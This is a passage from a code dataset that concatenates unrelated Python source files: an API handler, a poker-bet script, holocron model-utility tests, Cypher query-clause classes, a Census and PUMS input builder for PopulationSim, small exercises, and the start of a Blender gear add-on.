qgraph[\"nodes\"][target_qid]\n\n # features = correlations[0]\n source_features = features_from_node(source_qnode)\n target_features = features_from_node(target_qnode)\n kedge_pairs = [\n tuple(sorted([source_feature, target_feature]))\n for source_feature in source_features\n for target_feature in target_features\n ]\n\n kgraph = {\n \"nodes\": {},\n \"edges\": {},\n }\n results = []\n for pair in kedge_pairs:\n if pair not in correlations:\n continue\n p_value = correlations[pair]\n source_feature, target_feature = pair # note the source and target may be flipped, which is okay\n source_kid, source_knode = knode(source_feature)\n target_kid, target_knode = knode(target_feature)\n kgraph[\"nodes\"].update({\n source_kid: source_knode,\n target_kid: target_knode,\n })\n kedges = knowledgegraph.knowledge_graph_edges(source_kid, target_kid, p_value=p_value)\n kgraph[\"edges\"].update(kedges)\n results.append({\n \"node_bindings\": {\n source_qid: [{\"id\": source_kid}],\n target_qid: [{\"id\": target_kid}],\n },\n \"edge_bindings\": {\n qedge_id: [\n {\n \"id\": kedge_id,\n }\n for kedge_id in kedges\n ]\n },\n \"score\": p_value,\n \"score_name\": \"p value\"\n })\n\n return {\n \"message\": {\n \"query_graph\": obj[\"message\"][\"query_graph\"], # Return unmodified\n \"knowledge_graph\": kgraph,\n \"results\": results,\n },\n \"workflow\": [\n {\"id\": \"lookup\"},\n ],\n }\nROUTER.post(\n \"/query\",\n response_model=Dict,\n tags=[\"reasoner\"],\n)(knowledge_graph_one_hop) # Change back to query\n\n@ROUTER.get(\n \"/bins\",\n response_model=Dict,\n)\ndef handle_bins(\n year: str = None,\n table: str = None,\n feature: str = None,\n api_key: APIKey = Depends(get_api_key),\n) -> Dict:\n \"\"\"Return bin values.\"\"\"\n input_file = os.path.join(get_config_path(), \"bins.json\") \n with open(input_file, \"r\") as stream:\n bins = json.load(stream)\n if feature is not None:\n bins = {\n year_key: {\n table_key: table_value.get(feature, None)\n for table_key, table_value in year_value.items()\n }\n for year_key, year_value in bins.items()\n }\n if table is not None:\n bins = {\n year_key: year_value.get(table, None)\n for year_key, year_value in bins.items()\n }\n if year is not None:\n bins = bins.get(year, None)\n return {\"return_value\": bins}\n","sub_path":"icees_api/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":24182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"481890980","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\nimport sys\nfrom random import randint\nfrom random import uniform\n\noldbet = float(sys.argv[1])\nbiggest_bet = float(sys.argv[2])\nstack = sys.argv[3]\nbet = 0\nrnd = randint(0,100)\n\nif rnd <= 30:\n #fold\n bet = 0\nelif rnd <= 60:\n #flat calls\n bet = biggest_bet - bet\nelif rnd <= 70:\n #3 bet\n bet = 3 * biggest_bet\nelse:\n #allin\n bet = float(stack) + oldbet\nprint(bet)","sub_path":"postflop.py","file_name":"postflop.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"263191075","text":"import unittest\nimport requests\nfrom io import BytesIO\nfrom PIL import Image\nimport torch\nfrom torchvision.models import mobilenet_v2\nfrom torchvision.transforms import transforms\n\nfrom holocron import utils\n\n\nclass Tester(unittest.TestCase):\n\n def test_gradcam(self):\n\n # Get a pretrained model\n model = mobilenet_v2(pretrained=True)\n conv_layer = 'features'\n\n # Hook the corresponding layer in the model\n gradcam = utils.ActivationMapper(model, conv_layer)\n\n # Get a dog image\n URL = 'https://www.woopets.fr/assets/races/000/066/big-portrait/border-collie.jpg'\n response = requests.get(URL)\n\n # Forward an image\n pil_img = Image.open(BytesIO(response.content), mode='r').convert('RGB')\n preprocess = transforms.Compose([\n transforms.Resize((224, 224)),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n img_tensor = preprocess(pil_img)\n out = model(img_tensor.unsqueeze(0))\n\n # Border collie index in ImageNet\n class_idx = 232\n\n # Use the hooked data to compute activation map\n activation_map = gradcam.get_activation_maps(out, class_idx)\n\n self.assertIsInstance(activation_map, torch.Tensor)\n self.assertEqual(activation_map.shape, (1, 7, 7))\n\n def test_get_module_names(self):\n\n # Get a model\n model = mobilenet_v2().eval()\n\n layer_names = utils.get_module_names(model)\n\n self.assertIsInstance(layer_names, list)\n self.assertEqual(len(layer_names), 141)\n self.assertEqual(layer_names[42], 'features.6.conv.0.2')\n\n def test_module_summary(self):\n\n # Get a model\n model = mobilenet_v2().eval()\n\n exec_sum = utils.module_summary(model, input_shape=(3, 224, 224))\n\n self.assertIsInstance(exec_sum, list)\n self.assertEqual(len(exec_sum), 141)\n self.assertEqual(exec_sum[42]['output_shape'], (None, 192, 28, 28))\n\n def test_summary(self):\n\n # Get a model\n model = mobilenet_v2().eval()\n\n summary_str = utils.summary(model, input_shape=(3, 224, 224))\n\n self.assertEqual(summary_str.split('\\n')[-9], 'Total params: 3,504,872')\n","sub_path":"test/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"48805020","text":"\nfrom .helper import key_for_cypher, value_for_cypher\n\nclass ClauseElement(object):\n \"\"\"\n Base class for filter elements that will be translated to Cypher.\n \"\"\"\n sign = ''\n template = \"{} {} {}\"\n def __init__(self, attribute, value):\n self.attribute = attribute\n self.value = value\n\n def __repr__(self):\n return ''.format(self.for_cypher())\n\n def __hash__(self):\n return hash((self.attribute, self.sign, self.value))\n\n def cypher_value_string(self):\n \"\"\"\n Create a Cypher parameter for the value of the clause.\n \"\"\"\n return '{%s}' % self.attribute.alias\n\n @property\n def annotations(self):\n \"\"\"\n Get all annotations involved in the clause.\n \"\"\"\n annotations = [self.attribute.base_annotation]\n try:\n annotations.append(self.value.base_annotation)\n except AttributeError:\n pass\n return annotations\n\n @property\n def attributes(self):\n \"\"\"\n Get all attributes involved in the clause.\n \"\"\"\n attributes = [self.attribute]\n if hasattr(self.value, 'annotation'):\n attributes.append(self.value)\n return attributes\n\n def for_cypher(self):\n \"\"\"\n Return a Cypher representation of the clause.\n \"\"\"\n try:\n value = self.value.for_cypher()\n except AttributeError:\n value = self.cypher_value_string()\n return self.template.format(self.attribute.for_cypher(),\n self.sign,\n value)\n\nclass EqualClauseElement(ClauseElement):\n \"\"\"\n Clause for asserting equality in a filter.\n \"\"\"\n sign = '='\n\nclass GtClauseElement(ClauseElement):\n \"\"\"\n Clause for asserting greater than in a filter.\n \"\"\"\n sign = '>'\n\nclass GteClauseElement(ClauseElement):\n \"\"\"\n Clause for asserting greater than or equal in a filter.\n \"\"\"\n sign = '>='\n\nclass LtClauseElement(ClauseElement):\n \"\"\"\n Clause for asserting less than in a filter.\n \"\"\"\n sign = '<'\n\nclass LteClauseElement(ClauseElement):\n \"\"\"\n Clause for asserting less than or equal in a filter.\n \"\"\"\n sign = '<='\n\nclass NotEqualClauseElement(ClauseElement):\n \"\"\"\n Clause for asserting not equal in a filter.\n \"\"\"\n sign = '<>'\n\nclass InClauseElement(ClauseElement):\n \"\"\"\n Clause for asserting membership in a filter.\n \"\"\"\n sign = 'IN'\n\nclass RegexClauseElement(ClauseElement):\n \"\"\"\n Clause for filtering based on regular expressions.\n \"\"\"\n sign = '=~'\n\nclass ContainsClauseElement(ClauseElement):\n \"\"\"\n Clause for filtering based on hierarchical relations.\n \"\"\"\n sign = 'contains'\n template = '''({alias})<-[:contained_by]-({token})-[:is_a]->({type} {{{label}: {value}}})'''\n def for_cypher(self):\n kwargs = {'alias':self.attribute.annotation.alias,\n 'value':value_for_cypher(self.value),\n 'label': key_for_cypher(self.attribute.label),\n 'type': ':{}_type'.format(self.attribute.annotation.type),\n 'token': ':{}'.format(self.attribute.annotation.type)}\n return self.template.format(**kwargs)\n\nclass AlignmentClauseElement(ClauseElement):\n \"\"\"\n Base class for filtering based on alignment.\n \"\"\"\n template = \"{first}.label = {second}.label\"\n side = ''\n def __init__(self, first, second):\n from .attributes import HierarchicalAnnotation\n self.first = first\n\n if not isinstance(first, HierarchicalAnnotation) and not isinstance(second, HierarchicalAnnotation):\n second = getattr(self.first, second.type)\n self.second = second\n\n def __hash__(self):\n return hash((self.first, self.template, self.second))\n\n @property\n def annotations(self):\n return [self.first, self.second]\n\n @property\n def attributes(self):\n return [self.first.id]\n\n def for_cypher(self):\n kwargs = {'second_node_alias': self.second.alias,\n 'first_node_alias': self.first.alias}\n return self.template.format(**kwargs)\n\nclass RightAlignedClauseElement(AlignmentClauseElement):\n \"\"\"\n Clause for filtering based on right alignment.\n \"\"\"\n template = '''not ({first_node_alias})-[:precedes]->()-[:contained_by*]->({second_node_alias})'''\n alias_to_use = 'end_alias'\n\nclass LeftAlignedClauseElement(AlignmentClauseElement):\n \"\"\"\n Clause for filtering based on left alignment.\n \"\"\"\n template = '''not ({first_node_alias})<-[:precedes]-()-[:contained_by*]->({second_node_alias})'''\n alias_to_use = 'begin_alias'\n\nclass NotRightAlignedClauseElement(RightAlignedClauseElement):\n \"\"\"\n Clause for filtering based on not being right aligned.\n \"\"\"\n template = '''({first_node_alias})-[:precedes]->()-[:contained_by*]->({second_node_alias})'''\n\nclass NotLeftAlignedClauseElement(LeftAlignedClauseElement):\n \"\"\"\n Clause for filtering based on not being left aligned.\n \"\"\"\n template = '''({first_node_alias})<-[:precedes]-()-[:contained_by*]->({second_node_alias})'''\n\n","sub_path":"polyglotdb/graph/elements.py","file_name":"elements.py","file_ext":"py","file_size_in_byte":5162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"628740642","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n\n\n# %%\n# This program prepares all inputs files needed by PopulationSim(RSG), including configuration, geo_crosswalk, Census marginals and PUMS sample households and persons\n# Syntax: > python popsim_input_maker.py key yaml (key: Census API key; yaml: a yaml configuration file such as region.yaml)\n\n# Inputs:\n# [year]/region_[year].yaml (yaml config input for input_maker.py)\n# [year]/settings_[year].yaml (a generic setting file for populationsim)\n# [year]/control_pre_[year].csv (control file same as populationsim, with additional \"acs_variables\" column)\n# PUMS/xxxxhxx.csv (PUMS household samples)\n# PUMS/xxxxpxx.csv (PUMS person samples)\n# geo/tract0010_to_puma.csv (tract00 and tract10 to PUMA crosswalk file)\n# geo/tract10_detroit_city.csv (tract10 to city_id, including Detroit neighborhood, equiv file)\n# geo/2010_Census_Tract_to_2010_PUMA.txt (tract2010 to PUMA)\n\n# outputs:\n# [year]/data/SEMCOG_[year]_control_totals_[geo].csv (marginal controls by geography)\n# [year]/data/SEMCOG_[year]_controls.csv (same as control_pre)\n# [year]/data/SEMCOG_[year]_geo_cross_walk.csv (geo cross walk)\n# [year]/data/SEMCOG_[year]_seed_households.csv (PUMS HH samples selected by synthesizing region)\n# [year]/data/SEMCOG_[year]_seed_persons.csv (PUMS person samples selected by synthesizing region)\n# [year]/data/SEMCOG_[year]_settings.yaml (modified setting file)\n# %%\nimport os\nimport re\nimport time\nimport pandas as pd\nfrom census import Census\nimport oyaml as yaml\nfrom collections import defaultdict\nfrom input_utils import *\nimport argparse\nimport shutil\n\n# %%\nparser = argparse.ArgumentParser()\nparser.add_argument(\"key\", help=\"Census API key\")\nparser.add_argument(\"yaml\", help=\"yaml configuration file name\")\nargs = parser.parse_args()\nt0 = time.time()\n\n# %%\nconf = yaml.load(open(\"./\" + args.yaml, \"r\"), Loader=yaml.Loader)\n# conf = yaml.load(open(\"./2020/region_2020.yaml\", \"r\"), Loader=yaml.Loader)\n\n# %%\nprj = conf[\"project\"]\nprj_name = prj[\"name\"]\ntarget = prj[\"target\"]\nacs_year = prj[\"acs_year\"]\nacs_sample = prj[\"acs_sample\"] # acs5 or acs1\nprj_folder = f\"{acs_year}/\"\nsettings_file = prj_folder + prj[\"settings\"].format(str(acs_year))\npre_control = prj_folder + prj[\"pre_control\"].format(str(acs_year))\nh_pums_csv = prj[\"h_pums_csv\"]\np_pums_csv = prj[\"p_pums_csv\"]\n\ngeo = conf[\"geography\"]\nstate = geo[\"state\"][0]\ncounties = geo[\"counties\"]\n\noutput_folder = prj_folder + \"data/\"\nif not os.path.exists(output_folder):\n os.makedirs(output_folder)\noutput_geo_cross = \"{}_{}_geo_cross_walk.csv\".format(prj_name, str(acs_year))\noutput_control = \"{}_{}_control_totals_.csv\".format(prj_name, str(acs_year))\noutput_seed_hhs = \"{}_{}_seed_households.csv\".format(prj_name, str(acs_year))\noutput_seed_persons = \"{}_{}_seed_persons.csv\".format(prj_name, str(acs_year))\n\nprint(f\"\\n *** synthersizing {target} for year {acs_year} ***\")\n\n\n# %% [markdown]\n# step 1. make geographic cross work file\nc = Census(args.key, year=acs_year)\n\n\n# %%\nprint(\n f\"\\nPreparing Census geographies crosswalk: \\n\\tstate: {state} \\n\\tcounty: {counties}\"\n)\n# download Census BGs for this region\nacgeo = Census_Downloader(c.acs5, state, counties, \"*\", \"*\")\n\ndf_geo = pd.DataFrame.from_dict(acgeo.download(\"NAME\")).drop(\"NAME\", axis=1)\ndf_geo[\"tractid\"] = df_geo[\"state\"] + df_geo[\"county\"] + df_geo[\"tract\"]\ndf_geo[\"blkgrpid\"] = df_geo[\"tractid\"] + df_geo[\"block group\"]\ndf_geo.columns = [col.upper() for col in df_geo.columns]\n\n# %%\n# depends on synthesizing year, switch to different tract-PUMA files\nif acs_year >= 2020:\n df_tract_puma = pd.read_csv(geo[\"tract20_puma10_file\"], dtype=str)\n df_tract_puma.rename(columns={\"PUMACE10\": \"PUMA\"}, inplace=True)\nelif (acs_year >= 2017) & (acs_year < 2020):\n df_tract_puma = pd.read_csv(geo[\"tract10_puma10_file\"], dtype=str)\n df_tract_puma.rename(columns={\"PUMA5CE\": \"PUMA\"}, inplace=True)\nelif (acs_year >= 2010) & (acs_year <= 2016):\n df_tract_puma = pd.read_csv(\n \"../\" + pre_folder + geo[\"tract_puma0010_file\"], dtype=str\n )\n df_tract_puma.columns = [col.upper() for col in df_tract_puma.columns]\n if acs_year >= 2012:\n df_tract_puma.fillna(\"00000\", inplace=True)\n df_tract_puma[\"PUMA\"] = df_tract_puma[\"PUMA10_ID\"] + df_tract_puma[\"PUMA00_ID\"]\n else:\n df_tract_puma.rename(columns={\"PUMA00_ID\": \"PUMA\"}, inplace=True)\nelse:\n print(\"synthesis year should be 2010 or later\")\n exit()\n\ndf_tract_puma = df_tract_puma.loc[df_tract_puma.STATEFP == acgeo.states]\ndf_tract_puma[\"COUNTYID\"] = df_tract_puma[\"STATEFP\"] + df_tract_puma[\"COUNTYFP\"]\ndf_tract_puma[\"TRACTID\"] = df_tract_puma[\"COUNTYID\"] + df_tract_puma[\"TRACTCE\"]\n\n\n# %%\n# join tract-PUMA and creat geo cross file\ndf_geo_cross = pd.merge(df_geo, df_tract_puma, on=\"TRACTID\", how=\"left\")\ndf_geo_cross[\"REGION\"] = 2\ndf_geo_cross = df_geo_cross[[\"TRACTID\", \"BLKGRPID\", \"PUMA\", \"COUNTYID\", \"REGION\"]]\nprint(\" saving geo cross walk to: \" + output_folder + output_geo_cross)\ndf_geo_cross.to_csv(output_folder + output_geo_cross)\n\n\n# %% [markdown]\n# step 2. download and compile maginal control files\n\n# %%\n# download Census marginal controls\n# Census controls variables are defined in \"controls_pre\" table(popsim \"controls\" table + \"acs_variables\" field )\n# \"acs_variables\" contains Census variables and expressions\n#\n\ncs = eval(f\"c.{acs_sample}\") # set API type\n\nprint(\"\\nCreating popsim marginal controls: \", acs_year)\nprint(\" downloading Census variables ...\")\ndfc = pd.read_csv(pre_control)\ndic_margs = {}\nfor geo, dfgeo in dfc.groupby(\"geography\"):\n full_vars = list(\n set(\n re.findall(\n r\"[B-C][0-9]{5}[A-Z]{0,1}_[0-9]{3}E\", str(list(dfgeo.acs_variables))\n )\n )\n )\n if geo == \"BLKGRP\":\n acd = Census_Downloader(cs, state, counties, \"*\", \"*\")\n geo_cols = [\"state\", \"county\", \"tract\", \"block group\"]\n elif geo == \"TRACT\":\n acd = Census_Downloader(cs, state, counties, \"*\")\n geo_cols = [\"state\", \"county\", \"tract\"]\n elif geo == \"COUNTY\":\n acd = Census_Downloader(cs, state, counties)\n geo_cols = [\"state\", \"county\"]\n\n print(\"\\t\" + geo + \" marginals \")\n dic_margs[geo] = acd.download(full_vars).set_index(geo_cols)\n\n if \"GEO_ID\" in dic_margs[geo].columns:\n # new Census API downloads an extra \"GEO_ID\" column\n dic_margs[geo].drop(\"GEO_ID\", axis=1, inplace=True)\n\n# %%\n# Compute popsim control variables from Census marginals\nprint(\" compiling popsim control fields ...\")\nfor geo, dfg in dfc.groupby(\"geography\"):\n dic_margs[geo] = dic_margs[geo].astype(float).fillna(0)\n for ind, r in dfg.iterrows():\n dic_margs[geo][r[\"control_field\"]] = dic_margs[geo].eval(\n r[\"acs_variables\"].replace('\"', \"\")\n )\n dic_margs[geo] = dic_margs[geo][list(dfg.control_field)] # keep only control fields\n\n\n# %%\nctr_geos = {}\nmapping_dict = {4: \"BLKGRPID\", 3: \"TRACTID\", 2: \"COUNTYID\"}\nfor geo, dfm in dic_margs.items():\n dfm[mapping_dict[dfm.index.nlevels]] = dfm.index.map(\"\".join)\n dfm.reset_index(drop=True, inplace=True)\n dfm.fillna(0, inplace=True)\n dfm.columns = [col.upper() for col in dfm.columns]\n\n # if \"HHBASE\" in dfm.columns:\n # dfm = dfm.loc[dfm.HHBASE >= 0]\n\n f_output_control = output_control.replace(\".csv\", geo.lower() + \".csv\")\n ctr_geos[geo] = f_output_control\n\n print(\" saving controls to: \" + output_folder + f_output_control)\n dfm.to_csv(output_folder + f_output_control)\n marginal_summary(dfm)\n\n# %% [markdown]\n# step 3. extract PUMS seed households and persons\n\nprint(\"\\nExtrating PUMS seed households and persons from state samples\")\n\n# %%\npuma_lst = df_geo_cross.PUMA.unique()\n\n# %%\nh_pums = pd.read_csv(h_pums_csv, dtype={\"SERIALNO\": str, \"PUMA\": str})\nh_pums = h_pums.set_index(\"SERIALNO\") # keep index as string, one-liner doesn't work\np_pums = pd.read_csv(p_pums_csv, dtype={\"SERIALNO\": str, \"PUMA\": str})\n\n# Census might change variable names by year, changed variables are in region config file\n# https://www2.census.gov/programs-surveys/acs/tech_docs/pums/ACS2019_PUMS_README.pdf?\nh_pums = pums_update(h_pums, conf[\"pums_var_updates\"][acs_year])\np_pums = pums_update(p_pums, conf[\"pums_var_updates\"][acs_year])\n\nemp_df = pd.DataFrame()\nh_samples, p_samples = [], []\ncount = 0\n\nif (acs_year <= 2011) or (acs_year >= 2017):\n h_pums = h_pums.loc[h_pums.PUMA.isin(puma_lst)]\n p_pums = p_pums.loc[p_pums.PUMA.isin(puma_lst)]\nelse:\n pums_grp = {}\n for pma in [\"PUMA10\", \"PUMA00\"]:\n pums_grp[pma] = defaultdict(dict)\n for indx, grp in h_pums.loc[h_pums[pma] != -9].groupby(pma):\n pums_grp[pma][\"households\"][indx] = grp\n for indx, grp in p_pums.loc[p_pums[pma] != -9].groupby(pma):\n pums_grp[pma][\"persons\"][indx] = grp\n pums_grp[pma][\"households\"][0] = emp_df\n pums_grp[pma][\"persons\"][0] = emp_df\n\n for puma in puma_lst:\n count += 1\n h_puma = pd.concat(\n [\n pums_grp[\"PUMA10\"][\"households\"][int(puma[:5])],\n pums_grp[\"PUMA00\"][\"households\"][int(puma[5:])],\n ]\n )\n h_puma[\"PUMA\"] = puma\n h_puma.index = str(count) + h_puma.index\n h_samples.append(h_puma)\n p_puma = pd.concat(\n [\n pums_grp[\"PUMA10\"][\"persons\"][int(puma[:5])],\n pums_grp[\"PUMA00\"][\"persons\"][int(puma[5:])],\n ]\n )\n p_puma[\"PUMA\"] = puma\n p_puma[\"SERIALNO\"] = str(count) + p_puma[\"SERIALNO\"]\n p_samples.append(p_puma)\n\n h_pums = pd.concat(h_samples)\n p_pums = pd.concat(p_samples)\n\nif target != \"housing_units\":\n h_pums = h_pums.loc[\n (h_pums.TYPE == 1) & (h_pums.NP > 0)\n ] # remove group quarters and empty units\np_pums = p_pums.loc[p_pums[\"SERIALNO\"].isin(h_pums.index)]\n\nh_pums, p_pums = preprocess_pums(h_pums, p_pums)\n\n# h_pums[\"hh_id\"] = h_pums.index.values\nh_pums[\"hh_id\"] = range(len(h_pums))\np_pums = pd.merge(\n p_pums, h_pums[[\"hh_id\"]], left_on=\"SERIALNO\", right_index=True, how=\"left\"\n)\n\nprint(\n f\"- saving seed households: {output_folder+output_seed_hhs}.| total {str(len(h_pums))} records\"\n)\nh_pums.to_csv(output_folder + output_seed_hhs)\nprint(\n f\"- saving seed persons: {output_folder+output_seed_persons}.| total {str(len(p_pums))} records\"\n)\np_pums.to_csv(output_folder + output_seed_persons)\n\n\n# %% [markdown]\n# step 4. modify popsim config\nprint(\"\\nupdate popsim settings\")\n\n# %%\nSORT_ORDER = [\n \"REGION\",\n \"PUMA\",\n \"MCD\",\n \"SAMPLEGEO\",\n \"TRACT\",\n \"BLKGRP\",\n \"TAZ\",\n \"BLK\",\n \"BUILDING\",\n]\nsorted_geos = list(ctr_geos.keys())\nsorted_geos.sort(key=lambda val: SORT_ORDER.index(val))\n\n\n# %%\nprj_settings = yaml.load(open(settings_file, \"r\"), Loader=yaml.FullLoader)\n\n# %%\ngeos = sorted_geos + [\"REGION\", \"PUMA\"]\ngeos.sort(key=lambda val: SORT_ORDER.index(val))\nprj_settings[\"geographies\"] = geos # sort by predefined order)\nprj_settings[\"seed_geography\"] = \"PUMA\"\n\nprj_settings[\"data_dir\"] = \"data/\" + str(acs_year)\n\n# %%\nfor litem in prj_settings[\"input_table_list\"]:\n if litem[\"tablename\"] == \"households\":\n litem[\"filename\"] = output_seed_hhs\n if litem[\"tablename\"] == \"persons\":\n litem[\"filename\"] = output_seed_persons\n if litem[\"tablename\"] == \"geo_cross_walk\":\n litem[\"filename\"] = output_geo_cross\n if \"_control_data\" in litem[\"tablename\"]:\n geo = litem[\"tablename\"].replace(\"_control_data\", \"\")\n if geo not in ctr_geos.keys():\n prj_settings[\"input_table_list\"].remove(litem)\n else:\n litem[\"filename\"] = ctr_geos[geo]\n del ctr_geos[geo]\nfor k in ctr_geos:\n prj_settings[\"input_table_list\"].append(\n {\"tablename\": k + \"_control_data\", \"filename\": ctr_geos[k]}\n )\n\n# %%\nprj_settings[\"control_file_name\"] = \"{}_{}_controls.csv\".format(prj_name, str(acs_year))\nprj_settings[\"output_tables\"] = {\n \"action\": \"include\",\n \"tables\": [\"summary_\" + x for x in sorted_geos],\n}\n\n\nsub_bal_lst = [\"sub_balancing.geography=\" + x for x in sorted_geos]\nprj_settings[\"run_list\"][\"steps\"] = (\n [\n \"input_pre_processor\",\n \"setup_data_structures\",\n \"initial_seed_balancing\",\n \"meta_control_factoring\",\n \"final_seed_balancing\",\n \"integerize_final_seed_weights\",\n ]\n + sub_bal_lst\n + [\"expand_households\", \"summarize\", \"write_tables\", \"write_synthetic_population\"]\n)\n\nwith open(\n \"{}{}_{}_settings.yaml\".format(output_folder, prj_name, acs_year), \"w\"\n) as yaml_file:\n yaml.dump(prj_settings, yaml_file, default_style=None, default_flow_style=False)\n\n\n# %% [markdown]\n# # copy pre control file\nprint(\"copy popsim master control file\")\nshutil.copy(\n pre_control, output_folder + \"{}_{}_controls.csv\".format(prj_name, str(acs_year)),\n)\n\n# %%\nprint(\n \"\\ntotal time: {} seconds\".format(round(time.time() - t0, 1)),\n \"\\nDone. All files are saved to \" + output_folder,\n \"\\nTo run Populationsim:\",\n '\\n\\t copy new settings and controls to configs folder and rename \"xxx_settings.yaml\" to \"settings.yaml\"',\n f\"\\n\\t copy other files in {acs_year}/data folder to data/{acs_year}/\",\n)\n\n","sub_path":"input_prep/popsim_input_maker.py","file_name":"popsim_input_maker.py","file_ext":"py","file_size_in_byte":13212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"281174189","text":"# Ejercicio 3.1\n\n\ndef converterToSeconds(hh, mm, ss):\n seconds = ss\n seconds += mm * 60\n seconds += hh * 3600\n\n return seconds\n\n\ndef converToHHSS(seconds):\n m = seconds / 60\n s = seconds % 60\n h = m / 60\n m = m % 60\n return h, m, s\n","sub_path":"Python/Class2/exercise_7.py","file_name":"exercise_7.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"592578826","text":"#Quick Sort(n*logn)-մեծ չափերի համար\ndata=[4,5,1,3,7,2,6,8]\n\ndef get_pivot(data,l,r):\n middleindex=(l+r)//2\n if (data[l]>=data[r] and data[l]<=data[middleindex]) or (data[l]<=data[r] and data[l]>=data[middleindex]):\n pivotindex=l\n elif (data[r]>=data[l] and data[r]<=data[middleindex]) or (data[r]<=data[l] and data[r]>=data[middleindex]):\n pivotindex=r\n elif (data[middleindex]>=data[l] and data[middleindex]<=data[r]) or (data[middleindex]<=data[l] and data[middleindex]>=data[r]):\n pivotindex=middleindex\n return pivotindex\n\ndef sort(data,l,r):\n pivotindex=get_pivot(data,l,r)\n pivotvalue=data[pivotindex]\n data[l],data[pivotindex]=data[pivotindex],data[l]\n border=l\n for i in range(l,r+1):\n if data[i]= 100:\n #print (\"invalid\")\n return \"invalid\"\n exit()\n else:\n number = str(number)\n leng = len(number)\n if leng == 1:\n num = once(number)\n return num\n if leng == 2:\n num = ten(number)\n return num\n #print (num)\n #print(tens_to_english(number))\n\n#print (checkValid(3))","sub_path":"HW5/num2eng4_t.py","file_name":"num2eng4_t.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"304363184","text":"#\n# ____ ________.___._______ .___ ____ ___ _____\n# \\ \\/ /\\__ | |\\ \\ | | | \\/ \\\n# \\ / / | |/ | \\| | | / \\ / \\\n# / \\ \\____ / | \\ | | / Y \\\n# /___/\\ \\ / ______\\____|__ /___|______/\\____|__ /\n# \\_/ \\/ \\/ \\/\n#\n# last mod 20 dec 2019 change to 2.8\n#\n# Feedback xynium@laposte.net\n\n\n# notes :\n# Backlash should be arond .99\n# With 20deg of pressure angle minimal tooth number is 13 check pinion\n#\n# For crown train add backlash 0.99\n\n# TODO For rack close mesh has to close the end of the rack\n# TODO Has we dublicate a whole tooth there is vertices in common -> need a cleanup for duplicate vertice\n\nimport bpy\n# from mathutils import *\nfrom math import sin, cos, tan, pi, atan, sqrt\n# from bpy.props import *\n\nbl_info = {\n \"name\": \"Gear\",\n \"description\": \"Add a gear mesh.\",\n \"author\": \"XYNIUM JP Lathuile\",\n \"version\": (1, 0),\n \"blender\": (2, 80, 0),\n \"location\": \"View3D > Add > Mesh\",\n \"warning\": \"\",\n \"support\": \"TESTING\",\n \"category\": \"Add Mesh\",\n}\n\nglobal PitchRadius, TeethN, PressureAng, Addendum, Dedendum, Fillet, Resolution, Thickness\nglobal HelicalAng, Width, LongRes, prop, Alpha, toDel, N, Pinion, CloseObj, jeu\nglobal nIntoth, ax\n\n\n#####################################\n# Main Add Mesh Gear + Pinion\n#####################################\n\n\nclass ObjectGear(bpy.types.Operator):\n bl_idname = \"mesh.primitive_gear\"\n bl_label = \"Add a Gear\"\n bl_options = {'REGISTER', 'UNDO', 'PRESET'}\n\n global toDel\n\n toDel = 0\n # default blender is mm\n UseMod = bpy.props.BoolProperty(name=\"Use module\", default=True)\n Pinions = bpy.props.BoolProperty(name=\"Pinion\", default=False)\n Adv = bpy.props.BoolProperty(name=\"Advenced setting\", default=False)\n CloseObjs = bpy.props.BoolProperty(name=\"Close Mesh\", default=False)\n TeethNs = bpy.props.IntProperty(name=\"Teeth Number\", default=40, min=9, soft_max=200)\n PitchRadiuss = bpy.props.FloatProperty(name=\"Reference Radius\", min=0.5, soft_max=200, default=20, unit='LENGTH',\n description=\"Pitch Radius\")\n PressureAngs = bpy.props.IntProperty(name=\"Pressure angle\", default=20, min=10, max=40)\n HelicalAngs = bpy.props.IntProperty(name=\"Tooth angle\", default=0, min=-45, max=45,\n description=\"Angle of the tooth in an Helical (Spiral) gear tooth\")\n Addendums = bpy.props.FloatProperty(name=\"Addendum \", min=0.001, soft_max=30, default=1, precision=1, unit='LENGTH',\n description=\"Addendum\")\n Dedendums = bpy.props.FloatProperty(name=\"Dedendum\", min=0.001, soft_max=30, default=1, precision=1, unit='LENGTH',\n description=\"Dedendum\")\n Fillets = bpy.props.FloatProperty(name=\"Fillet\", min=0.0001, soft_max=1, default=0.05, precision=2, unit='LENGTH',\n description=\"Fillet\")\n Resolutions = bpy.props.IntProperty(name=\"Resolution\", default=3, min=1, max=7,\n description=\"Resolution of the tooth profile\")\n LongRess = bpy.props.IntProperty(name=\"Long. Res.\", default=5, min=1, max=25,\n description=\"Resolution along the tooth extrusion\")\n Thicknesss = bpy.props.FloatProperty(name=\"Thickness\", default=5, min=0.05, soft_max=200, unit='LENGTH',\n description=\"Thickness of the tooth extrusion\")\n Widths = bpy.props.FloatProperty(name=\"Axis\", min=0.01, soft_max=200, default=6, unit='LENGTH', precision=1,\n description=\"Concentrical inner extrusion from Inner tooth\")\n props = bpy.props.EnumProperty(name=\"Type\", items=[(\"nor\", \"Normal\", \"Spur gear\"), (\"con\", \"Connical\",\n \"Connical gear\"), (\"cro\", \"Crown\", \"Crown\"), (\"rac\", \"Rack\", \"Rack\")], default=\"nor\")\n Alphas = bpy.props.IntProperty(name=\"Cone Angle\", default=90, min=10, max=180,\n description=\"Full Angle at vertex cone\")\n Ns = bpy.props.FloatProperty(name=\"Multiply Rate\", default=2, min=0.01, soft_max=30, description=\"Multipling rate\")\n jeus = bpy.props.FloatProperty(name=\"Backlash\", default=1, min=0.6, max=1, precision=3, 